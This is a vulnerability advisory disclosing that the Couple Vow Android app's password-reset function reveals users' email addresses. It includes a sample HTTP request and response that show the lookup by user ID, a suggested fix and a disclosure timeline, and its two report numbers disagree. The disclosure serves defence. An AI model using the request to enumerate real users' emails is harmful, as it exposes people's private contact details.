SIK-2017-054


Title:

Information disclosure in CoupleVow App

Report ID

SIK-2017-045

Summary:

  • Vendor: 애펙스 주식회사
  • Product: Couple Vow (Package-Name: com.ms.coupleobserver)
  • Affected Version: 3.0.2
  • Severity: low
  • Short summary: When using the „forgot password“ capability, the email address is displayed to the user

Details:

When using the „forgot password“ function, the username needs to be entered and the app will show you the email address of the user to which the password-reset link has been sent.
In this way, an attacker can get email addresses belonging to userids.

POST /****/****/ HTTP/1.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1.1; TP601A Build/LMY47V)
Host: push001.safe4kid.co.kr

{"method":"find_pass","my_id":"safran","iso_code":""}

RESPONSE

HTTP/1.1 200 OK
Date: Wed, 09 Aug 2017 15:30:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.4.38
Content-Length: 48
Connection: close
Content-Type: application/json

{"result":"success","email":"victims@mail.addr"}

Workaround

Suggested Mitigation

Don’t display the email address.
The user should know her email address by herself.

Timeline

  • 2017-08-09 Vulnerability Discovered
  • 2017-08-09 Contacted developer
  • 2018-08-11 Published